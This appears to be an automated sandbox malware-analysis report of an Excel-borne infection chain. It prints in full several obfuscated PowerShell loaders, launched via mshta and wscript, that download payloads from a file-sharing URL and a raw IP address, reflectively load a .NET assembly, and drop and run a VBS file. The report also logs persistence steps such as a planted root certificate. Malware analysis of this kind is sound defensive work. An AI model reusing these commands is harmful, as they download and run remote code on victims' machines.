          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mffkkngw\mffkkngw.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.cmdline"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mffkkngw\mffkkngw.cmdline"
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00189247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,38_2_00189247
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE899D022D push eax; iretd 6_2_000007FE899D0241
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE899D00BD pushad ; iretd 6_2_000007FE899D00C1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 30_2_0040134A pushfd ; retf 30_2_00401353
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 30_2_004012F2 pushfd ; retf 30_2_004012F3
          Source: C:\Windows\explorer.exeCode function: 39_2_0006A055 push es; iretd 39_2_0006A05D
          Source: C:\Windows\explorer.exeCode function: 39_2_00061405 push esi; ret 39_2_00061407
          Source: C:\Windows\explorer.exeCode function: 39_2_000647A7 push esp; iretd 39_2_000647A8
          Source: C:\Windows\explorer.exeCode function: 39_2_000614D4 push esi; ret 39_2_000614D6
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 40_2_0008967E push ds; retf 40_2_00089680
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 40_2_000894E6 push edx; ret 40_2_000894E7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 40_2_000838A7 push esp; iretd 40_2_000838A8
          Source: C:\Windows\explorer.exeCode function: 42_2_00061405 push esi; ret 42_2_00061407
          Source: C:\Windows\explorer.exeCode function: 42_2_000614D4 push esi; ret 42_2_000614D6

          Persistence and Installation Behavior

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.dllJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vtjrhjiJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\mffkkngw\mffkkngw.dllJump to dropped file
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\vtjrhjiJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\vtjrhji:Zone.Identifier read attributes | delete
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
